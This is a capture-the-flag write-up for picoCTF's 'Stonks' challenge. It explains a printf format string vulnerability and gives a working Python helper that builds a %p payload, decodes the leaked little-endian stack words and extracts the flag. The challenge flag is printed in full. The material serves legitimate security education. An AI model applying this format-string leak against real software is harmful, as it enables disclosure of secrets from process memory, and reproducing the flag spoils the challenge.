Stonks

Problem

I decided to try something no one else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's insecure!

Files: vuln.c
Connect: nc mercury.picoctf.net 16439

Solution

  1. We can compile the C source as a 32-bit binary with gcc -g -m32 vuln.c -o vuln, and then generate a pwntools template with pwn template --host mercury.picoctf.net --port 16439 vuln.

  2. This is a standard format string vulnerability: user input is passed to printf as the format string itself. gcc even warns about the non-literal format string when we compile it.

  3. However, my solution is based on this writeup.

  4. Essentially, the solution script works by sending a string of repeated %p specifiers to the vulnerable printf call. Each %p consumes one 32-bit word from the stack and prints it in hex. Eventually, we work our way far enough up the stack to reach api_buf, which holds the flag, and it is printed out as little-endian hexadecimal words. We cannot use the looping '%{}$s'.format(i) trick from the PicoCTF 2018 'echooo' writeup here: the flag is stored inline in api_buf rather than behind a pointer on the stack, so %s would dereference the flag bytes as an address instead of printing them. With %p we get the raw words, and because the binary is little endian each 4-byte word comes out byte-reversed, which is why the dump has to be decoded rather than read directly.

  5. Once we dump the stack, we convert the hexadecimal words back into bytes by packing each one as a little-endian 32-bit integer (equivalently, splitting each word into a byte array and reversing it), filtering out non-printable bytes, and then simply printing the flag.
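The decoding part of steps 4 and 5, as an added example written for this page rather than the script from the linked writeup. It builds the %p payload, parses the words printf prints back, undoes the little-endian byte order, and searches the reconstructed bytes for the flag. Since the remote service is not reachable offline, simulate_leak and sample_stack are constructed stand-ins that render a fake 32-bit stack the way glibc's printf("%p %p ...") would (no leading zeros, a zero word printed as "(nil)"); the word values in sample_stack are made up and only the flag itself is taken from this writeup.

```python
import re
import struct

# Flag from this writeup, embedded so the example runs without the remote service.
FLAG = b"picoCTF{I_l05t_4ll_my_m0n3y_c7cb6cae}"


def build_payload(n_words: int) -> bytes:
    """Format string that leaks n_words consecutive 32-bit stack words via %p."""
    return b" ".join([b"%p"] * n_words)


def parse_leak(output: str) -> list:
    """Turn printf's output into a list of 32-bit word values.

    glibc prints a NULL pointer as "(nil)" and everything else as 0x... with
    leading zeros stripped; any other token (the program's own prompt text)
    is ignored.
    """
    words = []
    for tok in output.split():
        if tok == "(nil)":
            words.append(0)
        elif tok.startswith("0x"):
            words.append(int(tok, 16))
    return words


def words_to_bytes(words) -> bytes:
    """Pack each leaked word back into memory order.

    The x86 stack is little-endian, so the printed hex is byte-reversed
    relative to how the characters sit in api_buf; struct's "<I" undoes that
    (and restores the leading zero bytes printf dropped).
    """
    return b"".join(struct.pack("<I", w & 0xFFFFFFFF) for w in words)


def extract_flag(output: str):
    """Reassemble the stack dump and pull the flag out of it, or None."""
    data = words_to_bytes(parse_leak(output))
    m = re.search(rb"picoCTF\{[^}]*\}", data)
    return m.group(0).decode() if m else None


def simulate_leak(stack_bytes: bytes) -> str:
    """Constructed stand-in for the remote program: render a fake stack the
    way printf("%p %p ...") would for a 32-bit process."""
    assert len(stack_bytes) % 4 == 0
    words = struct.unpack("<%dI" % (len(stack_bytes) // 4), stack_bytes)
    return " ".join("(nil)" if w == 0 else hex(w) for w in words)


def sample_stack() -> bytes:
    """Constructed sample: a few unrelated words, then api_buf holding the
    NUL-terminated flag, then more junk. The values are made up."""
    junk_before = struct.pack("<4I", 0x0804A000, 0xF7FA1000, 0, 0xFFFFD4C8)
    api_buf = FLAG.ljust(40, b"\x00")  # padded to a word boundary
    junk_after = struct.pack("<2I", 0x41414141, 0x08048610)
    return junk_before + api_buf + junk_after


if __name__ == "__main__":
    leak = simulate_leak(sample_stack())
    print("payload:", build_payload(16))
    print("leaked :", leak)
    print("flag   :", extract_flag(leak))
```

Against the real service the same parse_leak/extract_flag pair is applied to whatever comes back after sending build_payload(n) as the input that reaches printf; if the flag does not appear, n was not large enough to reach api_buf and should be increased.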

Flag

picoCTF{I_l05t_4ll_my_m0n3y_c7cb6cae}
